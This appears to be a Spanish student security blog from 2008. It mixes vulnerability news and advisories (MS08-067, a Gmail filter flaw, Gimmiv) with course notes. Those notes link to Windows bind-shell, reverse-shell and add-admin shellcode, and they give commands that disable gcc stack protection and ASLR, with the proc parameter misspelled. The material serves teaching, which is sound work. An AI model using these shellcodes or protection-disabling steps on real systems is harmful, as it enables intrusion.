Cuando uno crea un filtro en su cuenta de Gmail, se envía un requerimiento a los servidores de Google para que sea procesado. El requerimiento se realiza con la forma de una URL con varias variables. Por razones de seguridad, su navegador no muestra todas las variables que hay en la URL. Usando Firefox y un agregado que se llama Live HTTP Headers (encabezados HTTP en vivo), uno puede ver exactamente que variables son enviadas desde su navegador hacia los servidores de Google.

Después de eso, un atacante sólo necesita identificar la variable que es el equivalente de el nombre de usuario.

"Obtener esta variable es difícil pero posible," dice. "No voy a decir como lograrlo, si uno busca suficiente en Internet logrará averiguarlo."

La variable "at" puede ser obtenida visitando sitios Web maliciosos, escribe Brandon, quien sugiere que Google haga que la variable "at" expire después de cada requerimiento en lugar de después de cada sesión [como es ahora].

Para evitar ser una víctima de la vulnerabilidad, los usuarios debe verificar a menudo sus filtros, sugiere Brandon. Los usuarios de Firefox pueden descargar una extensión llamada NoScript que ayuda a prevenir estos ataques, dice.

Por supuesto, cualquier sitio Web que use cookies para pedidos de autenticación puede ser aprovechada de la misma forma. Para evitar convertirse en una víctima de este tipo de exploit, los usuarios de Gmail deben cerrar su sesión cuando no la usan, y por supuesto no visitar sitios Web en los que no confíen.

Google no respondió a los pedidos sobre comentarios al respecto.

Fuente: news.cnet.com
http://geekcondition.com/2008/11/23/gmail-security-flaw-proof-of-concept/

Una vulnerabilidad de Gmail permitiría a atacantes reenviar correos

Una vulnerabilidad de seguridad de Gmail podría permitirle a un atacante fijar filtros en las cuentas de correo de los usuarios sin que lo sepan, segun una prueba de concepto publicada el domingo en GeekCondition.com.

En su publicación, se describe que la vulnerabilidad ha provocado que gente pierda sus nombres de dominios registrados mediante GoDaddy.com.

Sin publicar el exploit por completo, aquí está la clave cuando se explica que este se basa en obtener las variables que representan el nombre de usuario y el "at":


"Cuando uno crea un filtro en su cuenta de Gmail, se envía un requerimiento a los servidores de Google para que sea procesado. El requerimiento se realiza con la forma de una URL con varias variables. Por razones de seguridad, su navegador no muestra todas las variables que hay en la URL. Usando Firefox y un agregado que se llama Live HTTP Headers (encabezados HTTP en vivo), uno puede ver exactamente que variables son enviadas desde su navegador hacia los servidores de Google.
Después de eso, un atacante sólo necesita identificar la variable que es el equivalente de el nombre de usuario.

"Obtener esta variable es difícil pero posible," dice el autor. "No voy a decir como lograrlo, si uno busca suficiente en Internet logrará averiguarlo."

La variable "at" puede ser obtenida visitando sitios Web maliciosos, comenta el autor, quien sugiere que Google haga que la variable "at" expire después de cada requerimiento en lugar de después de cada sesión [como es ahora].

Para evitar ser una víctima de la vulnerabilidad, los usuarios debe verificar a menudo sus filtros. Los usuarios de Firefox pueden descargar una extensión llamada NoScript que ayuda a prevenir estos ataques, dice.

Por supuesto, cualquier sitio Web que use cookies para pedidos de autenticación puede ser aprovechada de la misma forma. Para evitar convertirse en una víctima de este tipo de exploit, los usuarios de Gmail deben cerrar su sesión cuando no la usan, y por supuesto no visitar sitios Web en los que no confíen.


Fuente: news.cnet.com

jueves, 20 de noviembre de 2008

El arte de la guerra

Hola, por si aún no han conseguido el libro de Sun Tzu "El Arte de la Guerra"; les dejo este link donde pueden descargarlo en formato pdf.

http://www.nacioncamba.net/PDFS/el_arte_de_la_guerra.pdf

sábado, 15 de noviembre de 2008

NASL2 Reference Manual

Hello I want to share with you this manual
because I´m sure that we'll need it, to do the plugin that the teacher left us.
The url is

http://michel.arboi.free.fr/nasl2ref/nasl2_reference.pdf

Good luck

¿Alguien había escuchado sobre World Community Grid?

Hoy uno de mis amigos me pidió que me uniera a esta comunidad, yo no sabía que era y así que me puse a investigar...

El Proyecto 'World Community Grid' lanzado por la multinacional IBM en noviembre de 2005 para combatir enfermedades como el sida o la investigación médica a través del aprovechamiento de la capacidad no utilizada de las computadoras personales, ha realizado 2.000 billones de cálculos gracias a 190.000 personas repartidas en 185 países. Con ellos, se han completado en menos de diez meses análisis que hubiesen tardado cien años.

'World Community Grid' es una iniciativa de carácter mundial que se basa en el uso de la capacidad no utilizada de las computadoras personales de particulares y empresas, cuando están disponibles, para crear una red mundial dedicada a investigar sobre enfermedades, desastres naturales y problemas medioambientales. Se estima que hay más de 650 millones de ordenadores personales en el mundo, y cada uno de ellos es un potencial participante en la 'World Community Grid'.

La tecnología de redes Grid consiste en la conexión, a través de Internet, de miles o de millones de esos ordenadores para crear un "sistema virtual" de gran capacidad, incluso superior a la de algunos superordenadores.

IBM ha donado el hardware, el software y los servicios técnicos necesarios para crear la infraestructura tecnológica que precisa esta iniciativa. Además, proporciona servicios de alojamiento, mantenimiento y asistencia técnica.

El primer proyecto que se ha desarrollado a través del 'World Community Grid' es 'Proteome Holdin (plegado de proteínas humanas), que tiene como finalidad identificar el proteoma humano. Su resultado ha sido la creación de una base de datos que contempla la estructura de al menos 120.000 proteínas.

Este proyecto supone una ayuda de gran valor para los científicos que tratan de identificar tratamientos para la curación de distintas enfermedades habiéndose conseguido en un solo año lo que de otra manera, con los ordenadores más potentes, hubiera tardado al menos un siglo.

En el caso del 'FightAIDS@Home' (lucha contra el sida desde casa), otra de las iniciativas llevadas a cabo por esta comunidad mundial, actualmente más de 165.000 usuarios están ayudando en la investigación sobre nuevos tratamientos contra la enfermedad en este nuevo proyecto. El objetivo es encontrar nuevas terapias para combatir la enfermedad.

Todos proyectos son seleccionados por un Comité Asesor, que evalúa las propuestas de entidades científicas y organizaciones sin ánimo de lucro. El Comité está formado por personalidades de instituciones como la Universidad de Oxford, la Clínica Mayo o la Organización Mundial de la Salud (OMS), entre otras, aunque cualquier centro de investigación puede proponer proyectos para ser llevados a cabo con esta red.


Investigaciones Activas

  • FightAIDS@Home (Lanzado el 21 de noviembre de 2005)
  • AfricanClimate@Home (Lanzado el 3 de septiembre de 2007)
  • Discovering Dengue Drugs - Together (Lanzado el 21 de agosto de 2007)
  • Help Cure Muscular Dystrophy (Lanzado el 19 de diciembre de 2006)
  • Human Proteome Folding (Pliegue del Proteoma Humano) - Fase 2 (Lanzado el 23 de junio de 2006) de
  • Help Conquer Cancer (Lanzado el 6 de noviembre de 2007)

Investigaciones Completadas

  • Fiocruz Genome Comparison (Comparación del Genoma) (Lanzado el 15 de noviembre de 2006)
  • Help Defeat Cancer (Ayude a Derrotar el Cáncer) (Lanzado el 20 de julio de 2006)
  • Proyecto Human Proteome Folding (Lanzado el 11 de noviembre de 2004, Completado el 18 de julio de 2006)


"El éxito de las investigaciones depende de que los individuos colectivamente contribuyan con su tiempo no utilizado de computación para mejorar el mundo.
"


¿Qué opinan de esto? es muy interesante, verdad!!!

Hola!

Les dejo aqui una liga de una guia de referencia sobre NASL, espera les sirva de ayuda.

http://www.virtualblueness.net/nasl.html#tth_sEc1.1

lunes, 3 de noviembre de 2008

Puntuación para el cálculo del CVSS

http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2

Actualización del kernel para Sun Solaris 8, 9, 10 y OpenSolaris

Sun ha dado a conocer un fallo en el kernel de Solaris que permitiría a usuarios locales eludir restricciones de seguridad.
La vulnerabilidad reside en un error en el kernel relacionado con las llamadas al sistema. Un atacante podría saltarse el modo multi-nivel en la política de seguridad de Solaris Trusted Extensions o en la política de aislamiento por zonas, chroot.

Sun ha publicado los siguientes parches disponibles, según versión y plataforma:

Para la plataforma SPARC:

* Solaris 8 aplicar actualización 117350-56 o superior, desde:
http://sunsolve.sun.com/search/document.do?assetkey=1-21-117350-56-1

* Solaris 9 aplicar actualización 122300-30, desde:
http://sunsolve.sun.com/search/document.do?assetkey=1-21-122300-30-1

* Solaris 10 aplicar actualización 137111-05, desde:
http://sunsolve.sun.com/search/document.do?assetkey=urn:cds:docid:1-21-137111-05-1

* OpenSolaris actualizar a snv_90 o superior.

Para plataforma x86:

* Solaris 8 aplicar actualización 117351-56 desde:
http://sunsolve.sun.com/search/document.do?assetkey=urn:cds:docid:1-21-117351-56-1

* Solaris 9 aplicar actualización 122301-30, desde:
http://sunsolve.sun.com/search/document.do?assetkey=urn:cds:docid:1-21-122301-30-1

* Solaris 10 aplicar actualización 137112-05, desde:
http://sunsolve.sun.com/search/document.do?assetkey=urn:cds:docid:1-21-137112-05-1

* OpenSolaris actualizar a snv_90 o superior.

10 VIRUS DE TERROR

Además de los disfraces y los dulces, el Halloween también trae consigo amenazas cibernéticas, que pueden causar serios estragos en tu computadora.

Muchos ejemplares de malware eligen vistosos disfraces para que los usuarios los dejen entrar, pero en ellos lo que da miedo no es su disfraz, sino sus efectos, advirtió la firma de protección PandaLabs.

Ubica los virus y evitalos:
1. Tixcet.A: Disfrazado de archivo de Microsoft Word, este gusano intentará colarse en la fiesta de los usuarios con el fin de eliminar archivos de diversas extensiones (.DOC, .MP3, .MOV, .ZIP, .JPG, entre otras), convirtiendo así la noche de Halloween en una auténtica noche de terror, puesto que serán muchos los que griten con pánico al ver que han perdido todas sus fotos, vídeos, canciones y documentos.

2. Antivirus2008pro: Este malware es uno de los más ingeniosos. Para colarse en las casas, se disfraza de antivirus gratuito. De esta manera, consigue que muchos le abran la puerta. Sin embargo, no tardan en gritar de terror, puesto que en seguida comenzará a mostrarles infecciones que realmente no tienen y no parará hasta que, desesperados, los usuarios accedan a comprar la versión de pago del antivirus. Un buen invitado si quieres que tu noche de Halloween dé auténtico miedo.

3. Goldun.TB: Este ladronzuelo se disfraza de archivo adjunto en un correo electrónico que anuncia la suspensión del servicio de Internet para colarse en los ordenadores, pero una vez allí lo que realmente hace es robar contraseñas e información de sistemas de pago electrónico. Un mal invitado para la noche de Halloween, ya que puede terminar robándote todo tu dinero, por muy bien guardado que lo tengas.

4. Baker.LGC: También conocido como el falso Fernando Alonso, este troyano se cuela en las máquinas de los usuarios disfrazado de una falsa noticia que anuncia un accidente sufrido por el piloto español de fórmula uno. Con este disfraz, Banker.LGC se gana la confianza de los usuarios para robarles sus datos bancarios y así hacerse con su dinero.

5. Turkojan.I: Este troyano lleva uno de los disfraces más atractivos, puesto que se hace pasar por un capítulo nuevo de la serie de dibujos animados Los Simpson. Debido a esto, muchos fans le abren la puerta, sin embargo, su aspecto real es mucho más terrorífico, puesto que se trata de un código malicioso que dañará el ordenador de los usuarios. Estamos ante un dibujo animadoque da miedo.

6. Banbra.FXT: El disfraz de este troyano para la noche de Halloween es el de funcionario brasileño. Haciéndose pasar por un correo electrónico del Ministerio Público Federal de Brasil, este troyano desvalijará las cuentas bancarias de aquellos usuarios que se fíen de él y se dejen engañar por su disfraz.

7. AutoKitty.A: Debido a su simpático icono de Hello Kitty, muchos se pueden sentir tentados a dejar pasar a estos este ejemplar de malware, sin embargo, bajo su inocente apariencia se encuentra un gusano que realiza numerosas modificaciones en el Registro de Windows, lo que imposibilita que el ordenador funcione con total normalidad. Muchos sentirán auténtico miedo cuando vean que su ordenador no funciona por culpa de este ejemplar de malware.

8. PHilto.A: ¿La famosa Paris Hilton en tu fiesta de Halloween? ¡No! Bajo el disfraz de vídeo de Paris Hilton, se esconde este troyano diseñado para descargar el adware detectado como NaviPromo en tu ordenador.

9. MeteorBot.A: ¿Qué es: un pájaro, un avión? ¿Superman? ¡No! Este backdoor llega a los ordenadores con el disfraz de superman, pero no se trata de un superhéroe, sino de un supervillano diseñado para robar información sobre el ordenador, como dirección IP, nombre de la máquina o sistema operativo.

10. PGPCoder.E: Una de las formas más seguras de que una fiesta de Halloween fracase es invitar a este troyano, ya que dejará la fiesta sin música, sin vídeos, sin fotos, Y es que su misión es cifrar todos los archivos del ordenador, tanto de música como de vídeo, texto, fotografía y otros muchos. Su disfraz no es muy ingenioso, puesto que avisa al usuario diciendo que sus archivos no están cifrados y que debería cifrarlos, sin embargo, sus resultados lo convierten en uno de los invitados más temibles para cualquier fiesta de Halloween.

Exploiting Format String Vulnerabilities

The article will try to explain the structure of the vulnerability and later use this knowledge to build sophisticated exploits. It will show you how to discover format string vulnerabilities in C source code, and why this new kind of vulnerability is more dangerous than the common buffer overflow vulnerability.

http://doc.bughunter.net/format-string/exploit-fs.html

Gusano malicioso en Facebook

Como sabemos, hoy en día está de moda el tener una cuenta en algún tipo de red social, por ejemplo, Facebook, en donde los usuarios no toman las medidas necesarias para mantener segura su información personal y es allí de donde se aprovechan los intrusos.

Fortinet ha detectado un gusano malicioso en Facebook que está utilizando Google Reader (una aplicación para organizar y acceder a tus sitios web más visitados) y Picasa, para que así los usuarios al acceder descarguen el código malicioso en sus equipos. Esta nueva amenaza utiliza ingeniería social para obtener información confidencial de los usuarios.

La estrategia que utiliza es simple y efectiva: un mensaje malicioso es enviado a los amigos del usuario infectado, invitándoles a visitar una página que contiene un video pero que para verlo necesitan descargan un códec especial. Como era de esperarse, dicho códec no es más que un troyano.

¿Pero cómo es que muchas personas quedan infectados? es muy fácil, el salto a través de Google Reader o Picada le da la sensación al usuario de que el video está guardado en Google, por lo que supone que debería ser seguro, y si le añadimos que el mensaje fue enviado por un amigo, hace que disminuya la cautela del usuario.

Por lo que hay que tener mucho cuidado con los archivos que descarguemos, navegar en un sistema que cuente con actualizaciones de seguridad, tener un antivirus actualizado, etc. Cualquiera puede caer en el engaño por lo cual debemos de estar protegidos.


Fuente: http://www.laflecha.net/canales/seguridad/noticias/alertan-de-un-gusano-malicioso-en-facebook

sábado, 1 de noviembre de 2008

El 95% de los empleados ponen en riesgo la SI en su empresa.

Websense dio a conocer los resultados de su encuesta Web@Work 2008 sobre el uso que los empleados hacen de Internet cuando están en su puesto de trabajo y de cómo sus hábitos de navegación influyen en la seguridad informática de la empresa.


El estudio refleja por un lado el alto índice de empleados que utilizan su computadora para navegar por páginas que no están relacionadas con su actividad laboral en horas de trabajo (un 95% de los empleados) y por otro, la preocupación de los miembros del departamento de IT sobre el tipo de páginas que visitan los empleados lo cual los deja expuestos a amenazas externas.
La actividad que más temor despierta entre los miembros del departamento de IT y que se ha incrementado respecto a los datos del 2007 es el hecho de poder enviar un e-mail a una dirección equivocada. Si el año anterior la cifra se situaba en un 15%, la nueva encuesta revela que este año, un 40% de trabajadores admitieron haber mandado un correo electrónico a una dirección equivocada. Esto corrobora otro ambiente de riesgo de negocio corporativo: la fuga de información interna confidencial.
Resultados de la Encuesta Web@Work América Latina 2008:

Tiempo de conexión
Un 95% de los empleados de compañías grandes de América Latina pasan parte de su tiempo de trabajo navegando por Internet por razones personales. • Un 49% de los gerentes medios admiten que pasan más de 50 minutos diarios navegando por páginas que no están relacionadas con su actividad laboral.

Actividades en línea no deseables
El 95% de los gerentes del departamento de IT están preocupados sobre el comportamiento en línea de los empleados, y más del 75% de los empleados admitieron haber hecho alguna actividad de riesgo para la información contenida en la computadora.
El uso de la mensajería instantánea es otra de las preocupaciones de los responsables del departamento de IT ya que un 62% de los empleados lo usa en horas de trabajo, aunque un 76% dice usarlo por motivos laborales. • Otro punto de atención es el uso de las conexiones inalámbricas con las computadoras que son propiedad de la empresa cuando se viaja o se trabaja de forma remota, sobre lo que un 36% de empleados han admitido utilizar.

Visita a webs personales
En general, más de un 98 % de los empleados han accedido a páginas no relacionadas con su actividad laboral durante horas de trabajo y el 64% tienen el hábito de visitar hasta 5 páginas diferentes. • Las páginas más consultadas por el empleado en la oficina y que no tienen relación con su actividad laboral son: banca y finanzas (77%), noticias, páginas gubernamentales y correo personal (un 75%).

Fuente: http://www.websense.com/global/es/PressRoom/PressReleases/PressReleaseDetail/?Release=0810071719

martes, 28 de octubre de 2008

Entrevistas para INTEL

PROGRAMA UNAM, MIÉRCOLES 29 DE OCTUBRE DE 2008
AUDITORIO J MARSAL ANEXO DE LA FACULTAD DE INGENIERIA - EDIFICIO DE POSGRADO
11:00 - 11:30 Presentación de Intel GDC, Guadalajara Design Center, por Héctor
Castillo
11:30 - 12:00 Presentación de GDC-BIOS, por Claudio Acosta
12:00 - 12:30 Presentación de GDC-VALIDATION, por Mario Romero
12:30 - 18:00 Entrevistas por perfil académico por Héctor Castillo, Claudio
Acosta, Mario Romero, Francisco de la Torre

Haber quíen gana?

Llevó dos horas a los desarrolladores de la herramienta de testing de seguridad Immunity el escribir el código de ataque para la vulnerabilidad de la cual Microsoft emitiera el parche el pasado jueves 23 de Octubre.

Microsoft decidió adelantar el parche sin esperar a su próximo boletín mensual de seguridad tras detectar un pequeño número de ataques dirigidos a explotar el fallo en el servicio Windows Server, utilizado para conectar diferentes recursos de red, como servidores de archivos e impresoras, sobre las redes. Enviando mensajes codiciosos a una máquina Windows que utilice Windows Server, los atacantes podrían tomar el control de los ordenadores de sus víctimas.

El software desarrollado por Immunity está disponible únicamente para sus clientes de pago, pero los expertos en seguridad temen que alguna versión del exploit empiece a circular públicamente en breve tiempo.

Al parecer, no requiere demasiado esfuerzo escribir código de ataque capaz de explotar la brecha, y al publicar su parche, Microsoft ha dado, no sólo a los expertos en seguridad, sino también a los propios hackers, información suficiente para ello.

lunes, 27 de octubre de 2008

malware challenge

Desafío malware 2008

El malware en el presente se ha convertido en un peligro para las computadoras de todo el mundo, siguiendo con su constante cambio natural, los analistas no pueden proteger sus sistemas con tan sólo antivirus. Los analistas de hoy necesitan habilidades para detectar malware indetectable a los antivirus. De esto es de lo que el desafío malware se trata. Este desafío pureba tus habilidades y obten algunos premios.

www.malwarechallenge.info/

domingo, 26 de octubre de 2008

Diversas vulnerabilidades en IBM DB2 9.x

Se han encontrado múltiples vulnerabilidades en IBM DB2, algunas son de impacto desconocido y otras podrían ser aprovechadas por un atacante remoto para causar una denegación de servicio o revelar información sensible.
* La primera vulnerabilidad está causada por un error en la función "SQLNLS_UNPADDEDCHARLEN()" que podría causar una violación de acceso (segmentation fault) en servidor DB2 al intentar acceder a una parte de memoria para la que no se tienen permisos.
* Las vistas (views) y los disparadores (triggers) deberían estar marcados como no operativos o ser descartados en el Native Managed Provider para .NET si los objetos no pueden ser mantenidos por quien los ha definido.
* Un error no especificado en los servicios de ordenación/listado podría ser explotado para revelar ciertas cadenas relacionadas con la contraseña de conexión.
Las vulnerabilidades están confirmadas para la versiones anteriores a la 9.x FP6 de IBM DB2.
Se recomienda aplicar el Fixpack 6, disponible desde:http://www.ibm.com/support/docview.wss?rs=71&uid=swg27007053

Ejecución remota de código en el reproductor multimedia VLC

Se ha descubierto una vulnerabilidad en el reproductor de archivos multimedia VLC que podría ser aprovechada por un atacante remoto para causar una denegación de servicio o ejecutar código arbitrario.
VLC Media Player es un completo reproductor multimedia que soporta un gran número de formatos, como pueden ser: MP3, MPEG, DIVX, VCD o DVD entre otros, así como varios protocolos de streaming. Además está disponible para un amplio número de plataformas distintas como Windows, Mac OS X y para varias distribuciones de Linux. VLC también puede ser utilizado como servidor en unicast o multicast, en IPv4 o IPv6, para una red de banda ancha y tiene disponible un plug-in para Firefox que permite ver algunos archivos Quicktime y Windows Media desde páginas web sin necesidad de utilizar los reproductores de Apple o Microsoft.
El problema está causado por un error de límites (en Ty.c) al procesar un archivo multimedia del tipo TY (TiVo) con las cabeceras especialmente modificadas. Esto podría dar lugar a un desbordamiento de búfer basado en pila que sería susceptible de ser utilizado para causar una denegación de servicio o ejecutar código arbitrario, si un usuario abre un archivo TY especialmente manipulado.
La vulnerabilidad, reportada por Tobias Klein, está confirmada para las versiones de la 0.9.0 a la 0.9.4. Se recomienda actualizar a la versión 0.9.5 del reproductor VLC cuando esté disponible, desde:http://www.videolan.org/vlc/

Un poco mas de informacion acerca de la reciente vulnerabilidad

Microsoft lanzó,una actualización clasificada como critica, ya que existía una vulnerabilidad en el protocolo RPC que permite la ejecución de código remoto en el equipo del usuario, sin interacción ni autenticación del mismo. En palabras sencillas, alguien puede ejecutar el código que desee en nuestro sistema (Windows 2000, XP, 2003, 2008, Vista) sin que nosotros nos enteremos de esa acción.Esta actualización se lanzó debido a que ya se había publicado una PoC (Proof of concept) para la vulnerabilidad, con lo cual se sabía que no tardaría en aparecer un código dañino que la aproveche para infectar masivamente millones de usuarios (generalmente un gusano).Esta suposición no tardó en confirmarse ya que en este momento existe al menos un gusano que se está aprovechando de la vulnerabilidad para infectar sistemas. El ejecutable detectado por ESETNOD32 como Win32/Gimmiv.A, registra una DLL (%SystemDir%\wbem\sysmgr.dll) en el sistema con el nombre “System Maintenance Service” y lanza procesos BAT para terminar con el antivirus que se encuentre residente en ese momento.Luego de ello, verifica la conexión a Internet del usuario, realizando una conexión a servidores de Google y si dicha conexión existe, continúa la infección. A partir de este momento comienza a enviar información a su creador sobre el sistema operativo y el antivirus instalado. El propósito final de Gimmiv es dar acceso al sistema infectado, enviando al atacante cualquier tipo de información que se considere relevante del sistema, como:
-Usuarios y contraseñas de Microsoft Live Mesenger (MSN)
-Usuarios y contraseñas de Microsoft Outlook Express
-Contraseñas almacenas en Microsoft Internet Explorer
-Cookies y otros métodos de autenticación
-Archivos deseados por el atacante
La forma de programación del malware es genérica lo cual indica que no ha sido diseñado para un objetivo determinado sino para infectar masivamente a cualquier usuario, por lo que es altamente recomendable actualizar de inmediato y utilizar un sistema antivirus capaz de detectarlo, como por ejemplo ESET NOD32

sábado, 25 de octubre de 2008

ALERTA DE SEGURIDAD

HOLA A TODOS ANEXO INFORMACIÓN QUE CONSIDERO DE GRAN IMPORTANCIA PARA SU DIFUSIÓN Y SOBRE TODO DE TOMEN LAS MEDIDAS REQUERIDAS PARA EVITAR SER VÍCTIMA DE ALGUN ATAQUE.

LA INFORMACIÓN QUE A CONTINUACIÓN SE PRESENTA FUE DIFUNDIDA VÍA ELECTRÓNICA POR EL ING. RAFAEL SANDOVAL VÁZQUEZ Y EL OBJETO DE LA PUBLICACIÓN EN ESTE BLOG ES PARA CONOCIMIENTO Y DIFUSIÓN DE LA INFORMACIÓN Y PARA IMPLEMENTAR MEDIDAS PREVENTIVAS PARA PROTECCIÓN DE NUESTROS EQUIPOS.


***** Actualizar los sistemas de forma inmediata dada la gravedad ***********************

Microsoft publicó este 23 de octubre el boletín de seguridad MS08-067 de carácter crítico, en el que se soluciona un problema de seguridad en el servicio Server de las distintas versiones del sistema operativo Windows. Debido a su gravedad, el fallo podría ser aprovechado por un atacante remoto para ejecutar código arbitrario y comprometer por completo un sistema vulnerable.

Este boletín de seguridad, el número 12 publicado durante octubre (y fuera del calendario establecido por Microsoft para la liberación de actualizaciones), es de carácter "CRITICO" para los sistemas equipados con Windows 2000, Windows XP o Windows Server 2003, mientras que para los sistemas con Windows Vista o Windows Server 2008 el problema está calificado como "importante".

La vulnerabilidad reside en el procesamiento de peticiones RPC (Remote Procedure Call) que efectúa el servicio Server. Un atacante remoto podría ejecutar código arbitrario a través de peticiones RPC especialmente manipuladas.

En el nuevo índice de explotabilidad introducido este mes, el problema está catalogado como "Consistent exploit code likely", es decir, que es probable la creación de un exploit consistente. En este caso.

HOY, EL EXPLOIT YA ES PUBLICO. LAS CARACTERISTICAS DE LA VULNERABILIDAD HACEN QUE SEA IDEAL PARA SER APROVECHADO POR UN GUSANO TIPO BLASTER, QUE SE CONVIRTIO EN EPIDEMIA EN 2003.

Dada la GRAVEDAD de las vulnerabilidades se recomienda la actualización de los sistemas con la mayor brevedad posible, mediante Windows Update o descargando los parches, según versión, desde las siguientes direcciones:

* Microsoft Windows 2000 Service Pack 4:
http://www.microsoft.com/downloads/details.aspx?familyid=E22EB3AE-1295-4FE2-9775-6F43C5C2AED3&displaylang=es

* Windows XP Service Pack 2:
http://www.microsoft.com/downloads/details.aspx?familyid=0D5F9B6E-9265-44B9-A376-2067B73D6A03&displaylang=es

* Windows XP Service Pack 3:
http://www.microsoft.com/downloads/details.aspx?familyid=0D5F9B6E-9265-44B9-A376-2067B73D6A03&displaylang=es

* Windows XP Professional x64 Edition:
http://www.microsoft.com/downloads/details.aspx?familyid=4C16A372-7BF8-4571-B982-DAC6B2992B25&displaylang=es

* Windows XP Professional x64 Edition Service Pack 2:
http://www.microsoft.com/downloads/details.aspx?familyid=4C16A372-7BF8-4571-B982-DAC6B2992B25&displaylang=es

* Windows Server 2003 Service Pack 1:
http://www.microsoft.com/downloads/details.aspx?familyid=F26D395D-2459-4E40-8C92-3DE1C52C390D&displaylang=es

* Windows Server 2003 Service Pack 2:
http://www.microsoft.com/downloads/details.aspx?familyid=F26D395D-2459-4E40-8C92-3DE1C52C390D&displaylang=es

* Windows Server 2003 x64 Edition:
http://www.microsoft.com/downloads/details.aspx?familyid=C04D2AFB-F9D0-4E42-9E1F-4B944A2DE400&displaylang=es

* Windows Server 2003 x64 Edition Service Pack 2:
http://www.microsoft.com/downloads/details.aspx?familyid=C04D2AFB-F9D0-4E42-9E1F-4B944A2DE400&displaylang=es

* Windows Server 2003 con SP1 para Itanium-based Systems:
http://www.microsoft.com/downloads/details.aspx?familyid=AB590756-F11F-43C9-9DCC-A85A43077ACF&displaylang=es

* Windows Server 2003 con SP2 para Itanium-based Systems:
http://www.microsoft.com/downloads/details.aspx?familyid=AB590756-F11F-43C9-9DCC-A85A43077ACF&displaylang=es

* Windows Vista y Windows Vista Service Pack 1:
http://www.microsoft.com/downloads/details.aspx?familyid=18FDFF67-C723-42BD-AC5C-CAC7D8713B21&displaylang=es

* Windows Vista x64 Edition y Windows Vista x64 Edition Service Pack 1:
http://www.microsoft.com/downloads/details.aspx?familyid=A976999D-264F-4E6A-9BD6-3AD9D214A4BD&displaylang=es

* Windows Server 2008 para 32-bit Systems:
http://www.microsoft.com/downloads/details.aspx?familyid=25C17B07-1EFE-43D7-9B01-3DFDF1CE0BD7&displaylang=es

* Windows Server 2008 para x64-based Systems:
http://www.microsoft.com/downloads/details.aspx?familyid=7B12018E-0CC1-4136-A68C-BE4E1633C8DF&displaylang=es

* Windows Server 2008 para Itanium-based Systems:
http://www.microsoft.com/downloads/details.aspx?familyid=2BCF89EF-6446-406C-9C53-222E0F0BAF7A&displaylang=es


Más Información:

Microsoft Security Bulletin Advance Notification for October 2008
http://www.microsoft.com/technet/security/bulletin/ms08-oct.mspx

Microsoft Security Bulletin MS08-067 � Critical
Vulnerability in Server Service Could Allow Remote Code Execution (958644)
http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx

15/10/2008 Boletines de seguridad de Microsoft en octubre
http://www.hispasec.com/unaaldia/3644/boletines-seguridad-microsoft-octubre

viernes, 24 de octubre de 2008

Vulnerabilidad en el servicio Server de Microsoft

===========================================================================
UNAM-CERT

Departamento de Seguridad en Cómputo

DGSCA-UNAM

Boletín de Seguridad UNAM-CERT-2008-024

Vulnerabilidad en el servicio Server de Microsoft podría permitir la
ejecución remota de código
===========================================================================

Microsoft ha liberado actualizaciones para sus sistemas operativos
Microsoft Windows fuera del periodo ordinario de actualizaciones debido
al reporte de una vulnerabilidad en el servicio Server que podría
permitir la ejecución remota de código. Por lo que se sugiere instalar
la actualización a la brevedad en sistemas de mision critica.


Fecha de Liberación: 23 de Octubre de 2008


Ultima Revisión: 23 de Octubre de 2008


Fuente: Microsoft Corp., Foros y listas de
discusión.


http://www.seguridad.unam.mx/vulnerabilidadesDB/?vulne=5666

jueves, 23 de octubre de 2008

Explotando fallos Buffer-Overflow

Hola muchachos, pues como recordarán la clase que Christian nos hizo favor de dar en esta semana sobre como explotar fallos buffer-overflow, bueno, para todos aquellos que nos llegamos a perder en algún momento o para aquellos que querramos volver a repetirlo con más calma les dejo la liga de la revista PC PASO A PASO en formato pdf, en está se explica a detalle todo lo que hicimos en la clase con ejemplos y todo eso, y como el título de la misma lo dice lo hace paso a paso, revisenlo y pónganlo en práctica...

http://rapidshare.de/files/40747023/PC_PASO_A_PASO.pdf.html

También están dos artículos muy interesantes del protocolo ICMP y Firewall, también les puede servir...

miércoles, 22 de octubre de 2008

Seguridad en Fedora

Características de seguridad de Fedora, entre las que se cuentan "exec-shield" para evitar stack overflows:
http://fedoraproject.org/wiki/Security/Features

Una guía para crear exploits que evadan "exec-shield":
http://neworder.box.sk/newsread.php?newsid=13007

martes, 21 de octubre de 2008

Shellcode

Un shellcode es basicamente una serie de ordenes en ensamblador que hace algo de lo que podemos sacar provecho: ejecutar /bin/sh para obtener una shell, copiar una shell y ponerle un suid root, etc. Tienen características de programacion un tanto especiales.

Se usa para poder ejecutar código después de haber sobreescrito la direccion de retorno de un programa/función mediante un overflow, o mediante cualquier otro método válido. Es decir, el valor de la dirección de retorno que se sobreescribira será la de nuestra shellcode. Simplemente decir que cuando se produzca el desbordamiento y el salto se ejecutará nuestra shellcode.

Aquí les dejo algunos links de los códigos de algunos shellcodes y una breve descripción de lo que hacen.

  • Shellcode que deja una shell abierta en el puerto 8721. Funciona en NT, 2000 y XP:

http://www.terra.es/personal3/fistror/e/win32_bind.c

  • Shellcode que te conecta al puerto 8721 y te manda shell. Necesitas poner Netcat a la escucha y modificar la scode para poner tu IP.

http://www.terra.es/personal3/fistror/e/win32_reverse.asm

  • Shellcode que crea un usuario "X" con password "X" y lo une al grupo "Administrators".

http://www.terra.es/personal3/fistror/e/win32_adduser.asm

Hola!

El día de ayer observe que los compañeros que tenían ubuntu instalado, en el cual estaban intentando recrear el ataque no podían por algunos candados implementados en esta distribución, bueno les tengo la buena noticia de como quitar esos candados para que puedan recrear el ataque. Por supuesto que es de manera intensional, pues no deberiamos removerlos de un servidor de producción, sin embargo esos candados no son garantía de que no pueda explotarse un fallo, recuerden que siempre habrá técnicas para saltarse toda clase de controles.

El primer candadoo me parece que es al nivel de compilación, lo único que tienen que hacer es compilar sus programa desactivando la característica, se hace la siguiente manera:

$ gcc -fno-stack-protector -o

El segundo es modificar un parámetro en el proc de la siguiente forma:

$ echo 0 > /proc/sys/kernel/randomize_av_space

Bueno mucha suerte en intentar probar los códigos, no descarto que otras destribuciones tengan otros más controles implementados como fedora, por ejemplo. Si tuviesen más problemas recuerden que siempre basta con un googleaso.

Material de las presentaciones

http://rapidshare.com/files/156164149/vuln-1.pdf.html
http://rapidshare.com/files/156164150/vuln-2.pdf.html
http://rapidshare.com/files/156164151/vuln-3.pdf.html

lunes, 20 de octubre de 2008

Tutorial GDB

